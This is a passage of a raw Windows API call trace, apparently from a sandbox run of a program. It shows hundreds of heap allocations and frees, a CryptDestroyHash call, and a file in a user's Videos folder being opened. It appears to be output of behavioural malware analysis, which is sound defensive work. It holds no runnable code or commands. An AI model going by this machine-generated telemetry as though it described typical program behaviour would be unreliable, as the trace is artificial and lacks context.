hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0043.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0043.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0043.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0043.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0043.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0043.050] CryptDestroyHash (hHash=0x7c2100) returned 1 [0043.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0043.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0043.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0043.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0043.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0043.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0043.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0043.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0043.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0043.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0043.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0043.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0043.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0043.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0043.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0043.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0043.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0043.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0043.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0043.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0043.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0043.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0043.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0043.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0043.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0043.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0043.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0043.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0043.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0043.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0043.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0043.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0043.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0043.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0043.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0043.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0043.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0043.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0043.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0043.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0043.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0043.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0043.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0043.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0043.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0043.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0043.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0043.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0043.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0043.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0043.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0043.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0043.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0043.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0043.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0043.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0043.052] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0043.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0043.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0043.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0043.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0043.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0043.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0043.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0043.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0043.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0043.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0043.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0043.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0043.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0043.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0043.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0043.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0043.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0043.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0043.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0043.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0043.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0043.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0043.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0043.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0043.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0043.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0043.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0043.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0043.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0043.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0043.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac350 | out: hHeap=0x770000) returned 1 [0043.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0043.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c95d0 | out: hHeap=0x770000) returned 1 [0043.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0043.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0043.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0043.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0043.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1cd8 | out: hHeap=0x770000) returned 1 [0043.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0043.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0043.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0043.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0043.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0043.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0043.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0043.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0043.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0043.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0043.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0043.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0043.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0043.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0043.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0043.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0043.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a30 | out: hHeap=0x770000) returned 1 [0043.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0043.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0043.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0043.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0043.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0043.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0043.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0043.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0043.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0043.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0043.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0043.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0043.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0043.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0043.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0043.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0043.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0043.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0043.054] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0043.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0043.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0043.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0043.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0043.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0043.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0043.054] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0043.055] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0043.055] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0043.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0043.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0043.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0043.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0043.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0043.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0043.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0043.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0043.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2140 [0043.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xaa0008 [0043.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0043.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0043.055] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\H1IbodoXI-.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\h1ibodoxi-.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0043.055] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.055] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0043.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0043.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0043.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0043.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0043.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0043.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0043.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0043.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0043.056] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0043.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0043.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0043.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0043.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0043.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0043.056] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0043.056] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0043.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0043.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0043.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0043.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0043.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0043.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0043.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0043.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0043.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0043.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0043.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0043.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0043.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0043.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0043.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0043.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0043.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0043.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0043.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0043.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0043.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0043.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0043.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0043.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0043.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0043.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0043.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0043.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0043.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0043.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0043.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0043.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0043.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0043.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0043.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0043.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0043.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0043.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0043.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0043.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0043.058] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b")) returned 0x10 